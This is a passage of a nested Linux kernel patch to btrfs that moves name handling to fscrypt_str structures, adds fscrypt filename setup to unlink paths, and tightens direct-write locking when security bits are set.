++			  const struct fscrypt_str *name);
++int btrfs_insert_dir_item(struct btrfs_trans_handle *trans,
++			  const struct fscrypt_str *name, struct btrfs_inode *dir,
+ 			  struct btrfs_key *location, u8 type, u64 index);
+ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ 					     struct btrfs_root *root,
+ 					     struct btrfs_path *path, u64 dir,
+-					     const char *name, int name_len,
+-					     int mod);
++					     const struct fscrypt_str *name, int mod);
+ struct btrfs_dir_item *
+ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ 			    struct btrfs_root *root,
+ 			    struct btrfs_path *path, u64 dir,
+-			    u64 index, const char *name, int name_len,
+-			    int mod);
++			    u64 index, const struct fscrypt_str *name, int mod);
+ struct btrfs_dir_item *
+ btrfs_search_dir_index_item(struct btrfs_root *root,
+ 			    struct btrfs_path *path, u64 dirid,
+-			    const char *name, int name_len);
++			    const struct fscrypt_str *name);
+ int btrfs_delete_one_dir_name(struct btrfs_trans_handle *trans,
+ 			      struct btrfs_root *root,
+ 			      struct btrfs_path *path,
+@@ -3370,10 +3369,10 @@ struct inode *btrfs_lookup_dentry(struct inode *dir, struct dentry *dentry);
+ int btrfs_set_inode_index(struct btrfs_inode *dir, u64 *index);
+ int btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		       struct btrfs_inode *dir, struct btrfs_inode *inode,
+-		       const char *name, int name_len);
++		       const struct fscrypt_str *name);
+ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 		   struct btrfs_inode *parent_inode, struct btrfs_inode *inode,
+-		   const char *name, int name_len, int add_backref, u64 index);
++		   const struct fscrypt_str *name, int add_backref, u64 index);
+ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry);
+ int btrfs_truncate_block(struct btrfs_inode *inode, loff_t from, loff_t len,
+ 			 int front);
+@@ -3398,6 +3397,7 @@ struct btrfs_new_inode_args {
+ 	 */
+ 	struct posix_acl *default_acl;
+ 	struct posix_acl *acl;
++	struct fscrypt_name fname;
+ };
+ int btrfs_new_inode_prepare(struct btrfs_new_inode_args *args,
+ 			    unsigned int *trans_num_items);
+diff --git a/fs/btrfs/dir-item.c b/fs/btrfs/dir-item.c
+index 72fb2c518a2b4..fdab48c1abb8a 100644
+--- a/fs/btrfs/dir-item.c
++++ b/fs/btrfs/dir-item.c
+@@ -103,8 +103,8 @@ int btrfs_insert_xattr_item(struct btrfs_trans_handle *trans,
+  * to use for the second index (if one is created).
+  * Will return 0 or -ENOMEM
+  */
+-int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+-			  int name_len, struct btrfs_inode *dir,
++int btrfs_insert_dir_item(struct btrfs_trans_handle *trans,
++			  const struct fscrypt_str *name, struct btrfs_inode *dir,
+ 			  struct btrfs_key *location, u8 type, u64 index)
+ {
+ 	int ret = 0;
+@@ -120,7 +120,7 @@ int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+ 
+ 	key.objectid = btrfs_ino(dir);
+ 	key.type = BTRFS_DIR_ITEM_KEY;
+-	key.offset = btrfs_name_hash(name, name_len);
++	key.offset = btrfs_name_hash(name->name, name->len);
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -128,9 +128,9 @@ int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+ 
+ 	btrfs_cpu_key_to_disk(&disk_key, location);
+ 
+-	data_size = sizeof(*dir_item) + name_len;
++	data_size = sizeof(*dir_item) + name->len;
+ 	dir_item = insert_with_overflow(trans, root, path, &key, data_size,
+-					name, name_len);
++					name->name, name->len);
+ 	if (IS_ERR(dir_item)) {
+ 		ret = PTR_ERR(dir_item);
+ 		if (ret == -EEXIST)
+@@ -142,11 +142,11 @@ int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+ 	btrfs_set_dir_item_key(leaf, dir_item, &disk_key);
+ 	btrfs_set_dir_type(leaf, dir_item, type);
+ 	btrfs_set_dir_data_len(leaf, dir_item, 0);
+-	btrfs_set_dir_name_len(leaf, dir_item, name_len);
++	btrfs_set_dir_name_len(leaf, dir_item, name->len);
+ 	btrfs_set_dir_transid(leaf, dir_item, trans->transid);
+ 	name_ptr = (unsigned long)(dir_item + 1);
+ 
+-	write_extent_buffer(leaf, name, name_ptr, name_len);
++	write_extent_buffer(leaf, name->name, name_ptr, name->len);
+ 	btrfs_mark_buffer_dirty(leaf);
+ 
+ second_insert:
+@@ -157,7 +157,7 @@ second_insert:
+ 	}
+ 	btrfs_release_path(path);
+ 
+-	ret2 = btrfs_insert_delayed_dir_index(trans, name, name_len, dir,
++	ret2 = btrfs_insert_delayed_dir_index(trans, name->name, name->len, dir,
+ 					      &disk_key, type, index);
+ out_free:
+ 	btrfs_free_path(path);
+@@ -206,7 +206,7 @@ static struct btrfs_dir_item *btrfs_lookup_match_dir(
+ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ 					     struct btrfs_root *root,
+ 					     struct btrfs_path *path, u64 dir,
+-					     const char *name, int name_len,
++					     const struct fscrypt_str *name,
+ 					     int mod)
+ {
+ 	struct btrfs_key key;
+@@ -214,9 +214,10 @@ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ 
+ 	key.objectid = dir;
+ 	key.type = BTRFS_DIR_ITEM_KEY;
+-	key.offset = btrfs_name_hash(name, name_len);
++	key.offset = btrfs_name_hash(name->name, name->len);
+ 
+-	di = btrfs_lookup_match_dir(trans, root, path, &key, name, name_len, mod);
++	di = btrfs_lookup_match_dir(trans, root, path, &key, name->name,
++				    name->len, mod);
+ 	if (IS_ERR(di) && PTR_ERR(di) == -ENOENT)
+ 		return NULL;
+ 
+@@ -224,7 +225,7 @@ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ }
+ 
+ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+-				   const char *name, int name_len)
++				   const struct fscrypt_str *name)
+ {
+ 	int ret;
+ 	struct btrfs_key key;
+@@ -240,9 +241,10 @@ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+ 
+ 	key.objectid = dir;
+ 	key.type = BTRFS_DIR_ITEM_KEY;
+-	key.offset = btrfs_name_hash(name, name_len);
++	key.offset = btrfs_name_hash(name->name, name->len);
+ 
+-	di = btrfs_lookup_match_dir(NULL, root, path, &key, name, name_len, 0);
++	di = btrfs_lookup_match_dir(NULL, root, path, &key, name->name,
++				    name->len, 0);
+ 	if (IS_ERR(di)) {
+ 		ret = PTR_ERR(di);
+ 		/* Nothing found, we're safe */
+@@ -262,11 +264,8 @@ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+ 		goto out;
+ 	}
+ 
+-	/*
+-	 * see if there is room in the item to insert this
+-	 * name
+-	 */
+-	data_size = sizeof(*di) + name_len;
++	/* See if there is room in the item to insert this name. */
++	data_size = sizeof(*di) + name->len;
+ 	leaf = path->nodes[0];
+ 	slot = path->slots[0];
+ 	if (data_size + btrfs_item_size(leaf, slot) +
+@@ -303,8 +302,7 @@ struct btrfs_dir_item *
+ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ 			    struct btrfs_root *root,
+ 			    struct btrfs_path *path, u64 dir,
+-			    u64 index, const char *name, int name_len,
+-			    int mod)
++			    u64 index, const struct fscrypt_str *name, int mod)
+ {
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+@@ -313,7 +311,8 @@ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ 	key.type = BTRFS_DIR_INDEX_KEY;
+ 	key.offset = index;
+ 
+-	di = btrfs_lookup_match_dir(trans, root, path, &key, name, name_len, mod);
++	di = btrfs_lookup_match_dir(trans, root, path, &key, name->name,
++				    name->len, mod);
+ 	if (di == ERR_PTR(-ENOENT))
+ 		return NULL;
+ 
+@@ -321,9 +320,8 @@ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ }
+ 
+ struct btrfs_dir_item *
+-btrfs_search_dir_index_item(struct btrfs_root *root,
+-			    struct btrfs_path *path, u64 dirid,
+-			    const char *name, int name_len)
++btrfs_search_dir_index_item(struct btrfs_root *root, struct btrfs_path *path,
++			    u64 dirid, const struct fscrypt_str *name)
+ {
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+@@ -338,7 +336,7 @@ btrfs_search_dir_index_item(struct btrfs_root *root,
+ 			break;
+ 
+ 		di = btrfs_match_dir_item_name(root->fs_info, path,
+-					       name, name_len);
++					       name->name, name->len);
+ 		if (di)
+ 			return di;
+ 	}
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 77202addead83..0a46fff3dd067 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -1458,8 +1458,13 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 	if (iocb->ki_flags & IOCB_NOWAIT)
+ 		ilock_flags |= BTRFS_ILOCK_TRY;
+ 
+-	/* If the write DIO is within EOF, use a shared lock */
+-	if (iocb->ki_pos + iov_iter_count(from) <= i_size_read(inode))
++	/*
++	 * If the write DIO is within EOF, use a shared lock and also only if
++	 * security bits will likely not be dropped by file_remove_privs() called
++	 * from btrfs_write_check(). Either will need to be rechecked after the
++	 * lock was acquired.
++	 */
++	if (iocb->ki_pos + iov_iter_count(from) <= i_size_read(inode) && IS_NOSEC(inode))
+ 		ilock_flags |= BTRFS_ILOCK_SHARED;
+ 
+ relock:
+@@ -1467,6 +1472,13 @@ relock:
+ 	if (err < 0)
+ 		return err;
+ 
++	/* Shared lock cannot be used with security bits set. */
++	if ((ilock_flags & BTRFS_ILOCK_SHARED) && !IS_NOSEC(inode)) {
++		btrfs_inode_unlock(inode, ilock_flags);
++		ilock_flags &= ~BTRFS_ILOCK_SHARED;
++		goto relock;
++	}
++
+ 	err = generic_write_checks(iocb, from);
+ 	if (err <= 0) {
+ 		btrfs_inode_unlock(inode, ilock_flags);
+diff --git a/fs/btrfs/inode-item.c b/fs/btrfs/inode-item.c
+index 0eeb5ea878948..5add022d3534f 100644
+--- a/fs/btrfs/inode-item.c
++++ b/fs/btrfs/inode-item.c
+@@ -10,8 +10,8 @@
+ #include "print-tree.h"
+ 
+ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+-						   int slot, const char *name,
+-						   int name_len)
++						   int slot,
++						   const struct fscrypt_str *name)
+ {
+ 	struct btrfs_inode_ref *ref;
+ 	unsigned long ptr;
+@@ -27,9 +27,10 @@ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+ 		len = btrfs_inode_ref_name_len(leaf, ref);
+ 		name_ptr = (unsigned long)(ref + 1);
+ 		cur_offset += len + sizeof(*ref);
+-		if (len != name_len)
++		if (len != name->len)
+ 			continue;
+-		if (memcmp_extent_buffer(leaf, name, name_ptr, name_len) == 0)
++		if (memcmp_extent_buffer(leaf, name->name, name_ptr,
++					 name->len) == 0)
+ 			return ref;
+ 	}
+ 	return NULL;
+@@ -37,7 +38,7 @@ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+ 
+ struct btrfs_inode_extref *btrfs_find_name_in_ext_backref(
+ 		struct extent_buffer *leaf, int slot, u64 ref_objectid,
+-		const char *name, int name_len)
++		const struct fscrypt_str *name)
+ {
+ 	struct btrfs_inode_extref *extref;
+ 	unsigned long ptr;
+@@ -60,9 +61,10 @@ struct btrfs_inode_extref *btrfs_find_name_in_ext_backref(
+ 		name_ptr = (unsigned long)(&extref->name);
+ 		ref_name_len = btrfs_inode_extref_name_len(leaf, extref);
+ 
+-		if (ref_name_len == name_len &&
++		if (ref_name_len == name->len &&
+ 		    btrfs_inode_extref_parent(leaf, extref) == ref_objectid &&
+-		    (memcmp_extent_buffer(leaf, name, name_ptr, name_len) == 0))
++		    (memcmp_extent_buffer(leaf, name->name, name_ptr,
++					  name->len) == 0))
+ 			return extref;
+ 
+ 		cur_offset += ref_name_len + sizeof(*extref);
+@@ -75,7 +77,7 @@ struct btrfs_inode_extref *
+ btrfs_lookup_inode_extref(struct btrfs_trans_handle *trans,
+ 			  struct btrfs_root *root,
+ 			  struct btrfs_path *path,
+-			  const char *name, int name_len,
++			  const struct fscrypt_str *name,
+ 			  u64 inode_objectid, u64 ref_objectid, int ins_len,
+ 			  int cow)
+ {
+@@ -84,7 +86,7 @@ btrfs_lookup_inode_extref(struct btrfs_trans_handle *trans,
+ 
+ 	key.objectid = inode_objectid;
+ 	key.type = BTRFS_INODE_EXTREF_KEY;
+-	key.offset = btrfs_extref_hash(ref_objectid, name, name_len);
++	key.offset = btrfs_extref_hash(ref_objectid, name->name, name->len);
+ 
+ 	ret = btrfs_search_slot(trans, root, &key, path, ins_len, cow);
+ 	if (ret < 0)
+@@ -92,13 +94,13 @@ btrfs_lookup_inode_extref(struct btrfs_trans_handle *trans,
+ 	if (ret > 0)
+ 		return NULL;
+ 	return btrfs_find_name_in_ext_backref(path->nodes[0], path->slots[0],
+-					      ref_objectid, name, name_len);
++					      ref_objectid, name);
+ 
+ }
+ 
+ static int btrfs_del_inode_extref(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_root *root,
+-				  const char *name, int name_len,
++				  const struct fscrypt_str *name,
+ 				  u64 inode_objectid, u64 ref_objectid,
+ 				  u64 *index)
+ {
+@@ -107,14 +109,14 @@ static int btrfs_del_inode_extref(struct btrfs_trans_handle *trans,
+ 	struct btrfs_inode_extref *extref;
+ 	struct extent_buffer *leaf;
+ 	int ret;
+-	int del_len = name_len + sizeof(*extref);
++	int del_len = name->len + sizeof(*extref);
+ 	unsigned long ptr;
+ 	unsigned long item_start;
+ 	u32 item_size;
+ 
+ 	key.objectid = inode_objectid;
+ 	key.type = BTRFS_INODE_EXTREF_KEY;
+-	key.offset = btrfs_extref_hash(ref_objectid, name, name_len);
++	key.offset = btrfs_extref_hash(ref_objectid, name->name, name->len);
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -132,7 +134,7 @@ static int btrfs_del_inode_extref(struct btrfs_trans_handle *trans,
+ 	 * readonly.
+ 	 */
+ 	extref = btrfs_find_name_in_ext_backref(path->nodes[0], path->slots[0],
+-						ref_objectid, name, name_len);
++						ref_objectid, name);
+ 	if (!extref) {
+ 		btrfs_handle_fs_error(root->fs_info, -ENOENT, NULL);
+ 		ret = -EROFS;
+@@ -168,8 +170,7 @@ out:
+ }
+ 
+ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+-			struct btrfs_root *root,
+-			const char *name, int name_len,
++			struct btrfs_root *root, const struct fscrypt_str *name,
+ 			u64 inode_objectid, u64 ref_objectid, u64 *index)
+ {
+ 	struct btrfs_path *path;
+@@ -182,7 +183,7 @@ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+ 	u32 sub_item_len;
+ 	int ret;
+ 	int search_ext_refs = 0;
+-	int del_len = name_len + sizeof(*ref);
++	int del_len = name->len + sizeof(*ref);
+ 
+ 	key.objectid = inode_objectid;
+ 	key.offset = ref_objectid;
+@@ -201,8 +202,7 @@ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 
+-	ref = btrfs_find_name_in_backref(path->nodes[0], path->slots[0], name,
+-					 name_len);
++	ref = btrfs_find_name_in_backref(path->nodes[0], path->slots[0], name);
+ 	if (!ref) {
+ 		ret = -ENOENT;
+ 		search_ext_refs = 1;
+@@ -219,7 +219,7 @@ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 	ptr = (unsigned long)ref;
+-	sub_item_len = name_len + sizeof(*ref);
++	sub_item_len = name->len + sizeof(*ref);
+ 	item_start = btrfs_item_ptr_offset(leaf, path->slots[0]);
+ 	memmove_extent_buffer(leaf, ptr, ptr + sub_item_len,
+ 			      item_size - (ptr + sub_item_len - item_start));
+@@ -233,7 +233,7 @@ out:
+ 		 * name in our ref array. Find and remove the extended
+ 		 * inode ref then.
+ 		 */
+-		return btrfs_del_inode_extref(trans, root, name, name_len,
++		return btrfs_del_inode_extref(trans, root, name,
+ 					      inode_objectid, ref_objectid, index);
+ 	}
+ 
+@@ -247,12 +247,13 @@ out:
+  */
+ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 				     struct btrfs_root *root,
+-				     const char *name, int name_len,
+-				     u64 inode_objectid, u64 ref_objectid, u64 index)
++				     const struct fscrypt_str *name,
++				     u64 inode_objectid, u64 ref_objectid,
++				     u64 index)
+ {
+ 	struct btrfs_inode_extref *extref;
+ 	int ret;
+-	int ins_len = name_len + sizeof(*extref);
++	int ins_len = name->len + sizeof(*extref);
+ 	unsigned long ptr;
+ 	struct btrfs_path *path;
+ 	struct btrfs_key key;
+@@ -260,7 +261,7 @@ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 
+ 	key.objectid = inode_objectid;
+ 	key.type = BTRFS_INODE_EXTREF_KEY;
+-	key.offset = btrfs_extref_hash(ref_objectid, name, name_len);
++	key.offset = btrfs_extref_hash(ref_objectid, name->name, name->len);
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -272,7 +273,7 @@ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 		if (btrfs_find_name_in_ext_backref(path->nodes[0],
+ 						   path->slots[0],
+ 						   ref_objectid,
+-						   name, name_len))
++						   name))
+ 			goto out;
+ 
+ 		btrfs_extend_item(path, ins_len);
+@@ -286,12 +287,12 @@ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 	ptr += btrfs_item_size(leaf, path->slots[0]) - ins_len;
+ 	extref = (struct btrfs_inode_extref *)ptr;
+ 
+-	btrfs_set_inode_extref_name_len(path->nodes[0], extref, name_len);
++	btrfs_set_inode_extref_name_len(path->nodes[0], extref, name->len);
+ 	btrfs_set_inode_extref_index(path->nodes[0], extref, index);
+ 	btrfs_set_inode_extref_parent(path->nodes[0], extref, ref_objectid);
+ 
+ 	ptr = (unsigned long)&extref->name;
+-	write_extent_buffer(path->nodes[0], name, ptr, name_len);
++	write_extent_buffer(path->nodes[0], name->name, ptr, name->len);
+ 	btrfs_mark_buffer_dirty(path->nodes[0]);
+ 
+ out:
+@@ -301,8 +302,7 @@ out:
+ 
+ /* Will return 0, -ENOMEM, -EMLINK, or -EEXIST or anything from the CoW path */
+ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+-			   struct btrfs_root *root,
+-			   const char *name, int name_len,
++			   struct btrfs_root *root, const struct fscrypt_str *name,
+ 			   u64 inode_objectid, u64 ref_objectid, u64 index)
+ {
+ 	struct btrfs_fs_info *fs_info = root->fs_info;
+@@ -311,7 +311,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 	struct btrfs_inode_ref *ref;
+ 	unsigned long ptr;
+ 	int ret;
+-	int ins_len = name_len + sizeof(*ref);
++	int ins_len = name->len + sizeof(*ref);
+ 
+ 	key.objectid = inode_objectid;
+ 	key.offset = ref_objectid;
+@@ -327,7 +327,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 	if (ret == -EEXIST) {
+ 		u32 old_size;
+ 		ref = btrfs_find_name_in_backref(path->nodes[0], path->slots[0],
+-						 name, name_len);
++						 name);
+ 		if (ref)
+ 			goto out;
+ 
+@@ -336,7 +336,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 		ref = btrfs_item_ptr(path->nodes[0], path->slots[0],
+ 				     struct btrfs_inode_ref);
+ 		ref = (struct btrfs_inode_ref *)((unsigned long)ref + old_size);
+-		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name_len);
++		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name->len);
+ 		btrfs_set_inode_ref_index(path->nodes[0], ref, index);
+ 		ptr = (unsigned long)(ref + 1);
+ 		ret = 0;
+@@ -344,7 +344,7 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 		if (ret == -EOVERFLOW) {
+ 			if (btrfs_find_name_in_backref(path->nodes[0],
+ 						       path->slots[0],
+-						       name, name_len))
++						       name))
+ 				ret = -EEXIST;
+ 			else
+ 				ret = -EMLINK;
+@@ -353,11 +353,11 @@ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+ 	} else {
+ 		ref = btrfs_item_ptr(path->nodes[0], path->slots[0],
+ 				     struct btrfs_inode_ref);
+-		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name_len);
++		btrfs_set_inode_ref_name_len(path->nodes[0], ref, name->len);
+ 		btrfs_set_inode_ref_index(path->nodes[0], ref, index);
+ 		ptr = (unsigned long)(ref + 1);
+ 	}
+-	write_extent_buffer(path->nodes[0], name, ptr, name_len);
++	write_extent_buffer(path->nodes[0], name->name, ptr, name->len);
+ 	btrfs_mark_buffer_dirty(path->nodes[0]);
+ 
+ out:
+@@ -370,7 +370,6 @@ out:
+ 		if (btrfs_super_incompat_flags(disk_super)
+ 		    & BTRFS_FEATURE_INCOMPAT_EXTENDED_IREF)
+ 			ret = btrfs_insert_inode_extref(trans, root, name,
+-							name_len,
+ 							inode_objectid,
+ 							ref_objectid, index);
+ 	}
+diff --git a/fs/btrfs/inode-item.h b/fs/btrfs/inode-item.h
+index a8fc16d0147f6..b80aeb7157010 100644
+--- a/fs/btrfs/inode-item.h
++++ b/fs/btrfs/inode-item.h
+@@ -64,33 +64,31 @@ int btrfs_truncate_inode_items(struct btrfs_trans_handle *trans,
+ 			       struct btrfs_root *root,
+ 			       struct btrfs_truncate_control *control);
+ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+-			   struct btrfs_root *root,
+-			   const char *name, int name_len,
++			   struct btrfs_root *root, const struct fscrypt_str *name,
+ 			   u64 inode_objectid, u64 ref_objectid, u64 index);
+ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+-			   struct btrfs_root *root,
+-			   const char *name, int name_len,
+-			   u64 inode_objectid, u64 ref_objectid, u64 *index);
++			struct btrfs_root *root, const struct fscrypt_str *name,
++			u64 inode_objectid, u64 ref_objectid, u64 *index);
+ int btrfs_insert_empty_inode(struct btrfs_trans_handle *trans,
+ 			     struct btrfs_root *root,
+ 			     struct btrfs_path *path, u64 objectid);
+-int btrfs_lookup_inode(struct btrfs_trans_handle *trans, struct btrfs_root
+-		       *root, struct btrfs_path *path,
++int btrfs_lookup_inode(struct btrfs_trans_handle *trans,
++		       struct btrfs_root *root, struct btrfs_path *path,
+ 		       struct btrfs_key *location, int mod);
+ 
+ struct btrfs_inode_extref *btrfs_lookup_inode_extref(
+ 			  struct btrfs_trans_handle *trans,
+ 			  struct btrfs_root *root,
+ 			  struct btrfs_path *path,
+-			  const char *name, int name_len,
++			  const struct fscrypt_str *name,
+ 			  u64 inode_objectid, u64 ref_objectid, int ins_len,
+ 			  int cow);
+ 
+ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+-						   int slot, const char *name,
+-						   int name_len);
++						   int slot,
++						   const struct fscrypt_str *name);
+ struct btrfs_inode_extref *btrfs_find_name_in_ext_backref(
+ 		struct extent_buffer *leaf, int slot, u64 ref_objectid,
+-		const char *name, int name_len);
++		const struct fscrypt_str *name);
+ 
+ #endif
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 222068bf80031..4063447217f92 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3627,7 +3627,7 @@ void btrfs_run_delayed_iputs(struct btrfs_fs_info *fs_info)
+ 	spin_unlock(&fs_info->delayed_iput_lock);
+ }
+ 
+-/**
++/*
+  * Wait for flushing all delayed iputs
+  *
+  * @fs_info:  the filesystem
+@@ -4272,7 +4272,7 @@ int btrfs_update_inode_fallback(struct btrfs_trans_handle *trans,
+ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 				struct btrfs_inode *dir,
+ 				struct btrfs_inode *inode,
+-				const char *name, int name_len,
++				const struct fscrypt_str *name,
+ 				struct btrfs_rename_ctx *rename_ctx)
+ {
+ 	struct btrfs_root *root = dir->root;
+@@ -4290,8 +4290,7 @@ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 
+-	di = btrfs_lookup_dir_item(trans, root, path, dir_ino,
+-				    name, name_len, -1);
++	di = btrfs_lookup_dir_item(trans, root, path, dir_ino, name, -1);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto err;
+@@ -4319,12 +4318,11 @@ static int __btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		}
+ 	}
+ 
+-	ret = btrfs_del_inode_ref(trans, root, name, name_len, ino,
+-				  dir_ino, &index);
++	ret = btrfs_del_inode_ref(trans, root, name, ino, dir_ino, &index);
+ 	if (ret) {
+ 		btrfs_info(fs_info,
+ 			"failed to delete reference to %.*s, inode %llu parent %llu",
+-			name_len, name, ino, dir_ino);
++			name->len, name->name, ino, dir_ino);
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto err;
+ 	}
+@@ -4345,10 +4343,8 @@ skip_backref:
+ 	 * operations on the log tree, increasing latency for applications.
+ 	 */
+ 	if (!rename_ctx) {
+-		btrfs_del_inode_ref_in_log(trans, root, name, name_len, inode,
+-					   dir_ino);
+-		btrfs_del_dir_entries_in_log(trans, root, name, name_len, dir,
+-					     index);
++		btrfs_del_inode_ref_in_log(trans, root, name, inode, dir_ino);
++		btrfs_del_dir_entries_in_log(trans, root, name, dir, index);
+ 	}
+ 
+ 	/*
+@@ -4366,7 +4362,7 @@ err:
+ 	if (ret)
+ 		goto out;
+ 
+-	btrfs_i_size_write(dir, dir->vfs_inode.i_size - name_len * 2);
++	btrfs_i_size_write(dir, dir->vfs_inode.i_size - name->len * 2);
+ 	inode_inc_iversion(&inode->vfs_inode);
+ 	inode_inc_iversion(&dir->vfs_inode);
+ 	inode->vfs_inode.i_ctime = current_time(&inode->vfs_inode);
+@@ -4379,10 +4375,11 @@ out:
+ 
+ int btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		       struct btrfs_inode *dir, struct btrfs_inode *inode,
+-		       const char *name, int name_len)
++		       const struct fscrypt_str *name)
+ {
+ 	int ret;
+-	ret = __btrfs_unlink_inode(trans, dir, inode, name, name_len, NULL);
++
++	ret = __btrfs_unlink_inode(trans, dir, inode, name, NULL);
+ 	if (!ret) {
+ 		drop_nlink(&inode->vfs_inode);
+ 		ret = btrfs_update_inode(trans, inode->root, inode);
+@@ -4418,29 +4415,39 @@ static int btrfs_unlink(struct inode *dir, struct dentry *dentry)
+ 	struct btrfs_trans_handle *trans;
+ 	struct inode *inode = d_inode(dentry);
+ 	int ret;
++	struct fscrypt_name fname;
++
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (ret)
++		return ret;
++
++	/* This needs to handle no-key deletions later on */
+ 
+ 	trans = __unlink_start_trans(dir);
+-	if (IS_ERR(trans))
+-		return PTR_ERR(trans);
++	if (IS_ERR(trans)) {
++		ret = PTR_ERR(trans);
++		goto fscrypt_free;
++	}
+ 
+ 	btrfs_record_unlink_dir(trans, BTRFS_I(dir), BTRFS_I(d_inode(dentry)),
+ 			0);
+ 
+-	ret = btrfs_unlink_inode(trans, BTRFS_I(dir),
+-			BTRFS_I(d_inode(dentry)), dentry->d_name.name,
+-			dentry->d_name.len);
++	ret = btrfs_unlink_inode(trans, BTRFS_I(dir), BTRFS_I(d_inode(dentry)),
++				 &fname.disk_name);
+ 	if (ret)
+-		goto out;
++		goto end_trans;
+ 
+ 	if (inode->i_nlink == 0) {
+ 		ret = btrfs_orphan_add(trans, BTRFS_I(inode));
+ 		if (ret)
+-			goto out;
++			goto end_trans;
+ 	}
+ 
+-out:
++end_trans:
+ 	btrfs_end_transaction(trans);
+ 	btrfs_btree_balance_dirty(BTRFS_I(dir)->root->fs_info);
++fscrypt_free:
++	fscrypt_free_filename(&fname);
+ 	return ret;
+ }
+ 
+@@ -4453,12 +4460,17 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 	struct extent_buffer *leaf;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+-	const char *name = dentry->d_name.name;
+-	int name_len = dentry->d_name.len;
+ 	u64 index;
+ 	int ret;
+ 	u64 objectid;
+ 	u64 dir_ino = btrfs_ino(BTRFS_I(dir));
++	struct fscrypt_name fname;
++
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (ret)
++		return ret;
++
++	/* This needs to handle no-key deletions later on */
+ 
+ 	if (btrfs_ino(inode) == BTRFS_FIRST_FREE_OBJECTID) {
+ 		objectid = inode->root->root_key.objectid;
+@@ -4466,15 +4478,18 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 		objectid = inode->location.objectid;
+ 	} else {
+ 		WARN_ON(1);
++		fscrypt_free_filename(&fname);
+ 		return -EINVAL;
+ 	}
+ 
+ 	path = btrfs_alloc_path();
+-	if (!path)
+-		return -ENOMEM;
++	if (!path) {
++		ret = -ENOMEM;
++		goto out;
++	}
+ 
+ 	di = btrfs_lookup_dir_item(trans, root, path, dir_ino,
+-				   name, name_len, -1);
++				   &fname.disk_name, -1);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto out;
+@@ -4500,8 +4515,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 	 * call btrfs_del_root_ref, and it _shouldn't_ fail.
